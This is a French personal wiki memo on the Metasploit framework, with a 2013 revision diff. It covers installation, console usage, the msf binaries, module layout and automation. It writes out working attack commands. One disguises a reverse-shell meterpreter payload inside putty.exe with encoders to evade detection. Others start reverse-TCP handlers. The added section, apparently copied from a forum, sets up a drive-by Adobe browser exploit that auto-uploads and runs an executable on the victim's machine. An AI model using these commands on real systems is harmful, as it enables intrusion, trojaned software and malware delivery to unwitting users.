Metasploit
De Linuxmemo.
(→Installation) |
(→Automatisation) |
||
| Ligne 230 : | Ligne 230 : | ||
*Ruby Programming | *Ruby Programming | ||
The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new. | The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new. | ||
| + | |||
| + | *Script auto sur session meterpeter | ||
| + | firstly I understand from your post that you know how to get a meterpreter session from the victim already.....so what you should do is write a meterpreter script in ruby and configure the meterpreter session handler to execute the script automatically ( using set AutoRunScript) on establishment of session from victim. That way you won't have to wait in front of the console for the session. See example below :- | ||
| + | use exploit/windows/browser/adobe_geticon | ||
| + | set srvhost x.x.x.x | ||
| + | set srvport 80 | ||
| + | set uripath / | ||
| + | set payload windows/meterpreter/reverse_tcp | ||
| + | set lhost x.x.x.x ( if msf server and meterpreter handler is run on same machine then keep it same as srvhost) | ||
| + | set lport 4444 ( default option) | ||
| + | set AutoRunScript yourScript ( yourScript.rb is a ruby script in the /opt/metasploit/msf3/scripts/meterpreter dir and does getsystem, migrate,etc | ||
| + | at victim end) | ||
| + | exploit -j -z | ||
| + | when the victim visits the server link http://x.x.x.x/ he will open a meterpreter session and the script will auto upload and execute the custom EXE file on victim machine | ||
| + | Also if you need help with writting the meterpreter script just | ||
| + | (a) google around | ||
| + | (b) check the existing scripts in /opt/metasploit/msf3/scripts/meterpreter directory of your installation | ||
| + | (c) or write back here for help | ||
==Development-Environment== | ==Development-Environment== | ||
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment | https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment | ||
Version du 11 mai 2013 à 06:52
(voir meterpreter)
Sommaire |
Installation
apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems apt-get install git apt-get install build-essential ruby-dev libpcap-dev apt-get install rubygems libmysqlclient-dev
support mysql:
apt-get install mysql-server apt-get install rubygems libmysqlclient-dev gem install mysql apt-get install msgpack-python
git:
git clone https://github.com/rapid7/metasploit-framework.git metasploit
gem:
apt-get install libxslt-dev libxml2-dev gem install bundler Dans le rep du Gemfile bundler install
shell
help, info, set, show et use.
show exploits search use windows/http/savant_31_overflow show options set RHOST 192.168.1.5 show targets set TARGET 0 show payloads set PAYLOAD windows/shell/reverse_nonx_tcp show options exploit
show options Affiche la liste des options et valeurs courantes (celles spécifiées avec la commande set)
show exploits Affiche la liste des exploits
show targets Affiche la liste des cibles
show payloads Affiche la liste des payloads disponibles
show advanced Affiche les options avancées
search
Keywords:
edb : Modules with a matching Exploit-DB ID bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID author : Modules written by this author port : Modules with a matching remote port path : Modules with a matching path or reference name type : Modules of a specific type (exploit, auxiliary, or post) platform : Modules affecting this platform name : Modules with a matching descriptive name osvdb : Modules with a matching OSVDB ID app : Modules that are client or server attacks
Examples:
search cve:2009 type:exploit app:client
Binaires
http://www.offensive-security.com/metasploit-unleashed/Main_Page
- msfbinscan (outil rapide pour déterminer la vulnerabilité d'un binaire a une faille donnée)
./msfbinscan -i [DLL] |grep -P "^Size "
- msfcli (Client mode script)
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=9030 LHOST=192.168.0.10 E
- msfconsole (Console)
- msfd (daemon Utilitaire qui ouvre le framework Metasploit pour l'accès distant)
- msfelfscan (outil de développement)
- msfencode (Camouflage des payload dans fichier en changeant la MD5)
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
- msfgui (Interface graphique)
- msfmachscan (outil de développement)
- msfpayload (Injection de playload dans fichier (exe, doc ...))
./msfpayload -l ./msfpayload windows/shell_bind_tcp O ./msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
- msfpescan (outil de développement déterminer le type de retour pop/pop/ret avec adresse fournie)
./msfpescan -D -a 0x767a38f6 win2000sp4.umpnpmgr.dll
- msfrop (outil de développement Return Oriented Programming (ROP) anti Windows "Data Execution Prevention" (DEP) a la recherche des "gadgets")
./msfrop -v metsrv.dll
- msfrpc (Client rpc)
./msfrpc -S -U msf -P msf -a 127.0.0.1
- msfrpcd (Daemon rpc)
./msfrpcd -U msf -P msf -f -S -a 127.0.0.1
- msfupdate (Mise a jour automatique en ligne)
./msfupdate
- msfvenom (combinaison de msfpayload et msfencode en une seule commande)
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT DE SORTIE> > nomdefichier ./msfvenom --help-formats Executable formats dll, exe, exe-small, elf, macho, vba, vba-exe, vbs, loop-vbs, asp, aspx, war, psh, psh-net Transform formats raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java
./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
./msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<NOTRE IP> | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -f exe > meter.exe
Arborescence des modules
Auxiliary La version 3.0 supporte le concept de modules auxiliaires qui peuvent être utilisés afin d'exécuter des actions arbitraires telles que le scan de ports, le déni de services entre autres. (Unlike exploit modules, auxiliary modules do not have a payload.)
Encoder
Exploit Les modules "Exploit" sont les modules principaux dans Metasploit.
Nop Les modules NOP sont utilisés pour les instructions de type "no-operation" pour exploiter les débordements de buffers.
Payload Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.
- (voir meterpreter)
Ajouter un exploit
Regarder dans le code la classe de l'exploit.
class Exploits::Windows::Misc::Doubletake
Recréer arborescence correspondante sous .msf4 dans votre répertoire utilisateur.
cd ~/.msf4 mkdir -p modules/exploits/windows/misc cp resp_ou_est_expoit/doubletake.rb modules/exploits/windows/misc/
Avant:
+ -- --=[ 302 exploits - 124 payloads
Apres:
+ -- --=[ 303 exploits - 124 payloads.
Maintenant vous pouvez utiliser le nouveau exploit.
Astuces
- db_connect automatique:
vim database.yml production: adapter: postgresql database: msf username: msf password: host: 127.0.0.1 port: 5432 pool: 75 timeout: 5
sudo echo export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/database.yml >> /etc/profile
- fichier de ressources
1-creation de fichier de commandes "monfichier.rc"
2-chargement du fichier de commandes avec "resource"
msf > resource monfichier.rc [*] Processing monfichier.rc for ERB directives. resource (karma.rc)> db_connect msf3:PASSWORD@127.0.0.1:7175/msf3
- meterpeter derrière 2 routeurs nat:
- les données télécharger sont stockées dans ~/.msf4/nom_module
- l'historique des commandes est dans ~/.msf4/history
- problème avec pcaprub bien souvant non compilé sur le système:
cd /opt/framework3/msf3/external/pcaprub ruby extconf.rb make make install
Recettes
DB Postgres jointures
SELECT hosts.address, hosts.name, hosts.os_name, services.proto, services.port, services.name, services.state, services.info FROM hosts, services WHERE hosts.id = services.host_id AND services.state = 'open' AND services.port = '21'
ou
SELECT hosts.address, hosts.name, hosts.os_name, services.proto, services.port, services.name, services.state, services.info FROM hosts INNER JOIN services ON hosts.id = services.host_id AND services.state = 'open' AND services.port = '21'
ou
SELECT hosts.address, hosts.name, hosts.os_name, services.proto, services.port, services.name, services.state, services.info FROM hosts INNER JOIN services ON hosts.id = services.host_id WHERE services.state = 'open' AND services.port = '21' AND hosts.address >= '41.158.0.0' AND hosts.address <= '41.159.0.0' ORDER BY hosts.address
Voir: Sql
Automatisation
- Resource Scripts Files
can be specified with the -r option to the Metasploit Console and ~/.msf4/msfconsole.rc is automatically executed on startup if it exists. Resource Scripts can also be executed from the console prompt through the resource command. Until this morning, however, resource scripts were limited to simple console commands. Ruby code can now be directly inserted into the resource scripts.
- Plugins
Plugins add new console commands that provide a utlity or automation function.
- Auxiliary Module Custom Commands
doesn't take an actual payload like an exploit. Auxiliary modules handle things like reconnaisance, authentication bypass, network sniffing, and vulnerability discovery.
- Custom Auxiliary Modules
- Metasploit Remote API
The Metasploit Framework and Metasploit Pro both support automation using a documented Remote API.
- Ruby Programming
The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new.
- Script auto sur session meterpeter
firstly I understand from your post that you know how to get a meterpreter session from the victim already.....so what you should do is write a meterpreter script in ruby and configure the meterpreter session handler to execute the script automatically ( using set AutoRunScript) on establishment of session from victim. That way you won't have to wait in front of the console for the session. See example below :-
use exploit/windows/browser/adobe_geticon set srvhost x.x.x.x set srvport 80 set uripath / set payload windows/meterpreter/reverse_tcp set lhost x.x.x.x ( if msf server and meterpreter handler is run on same machine then keep it same as srvhost) set lport 4444 ( default option) set AutoRunScript yourScript ( yourScript.rb is a ruby script in the /opt/metasploit/msf3/scripts/meterpreter dir and does getsystem, migrate,etc at victim end) exploit -j -z
when the victim visits the server link http://x.x.x.x/ he will open a meterpreter session and the script will auto upload and execute the custom EXE file on victim machine Also if you need help with writting the meterpreter script just (a) google around (b) check the existing scripts in /opt/metasploit/msf3/scripts/meterpreter directory of your installation (c) or write back here for help
Development-Environment
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
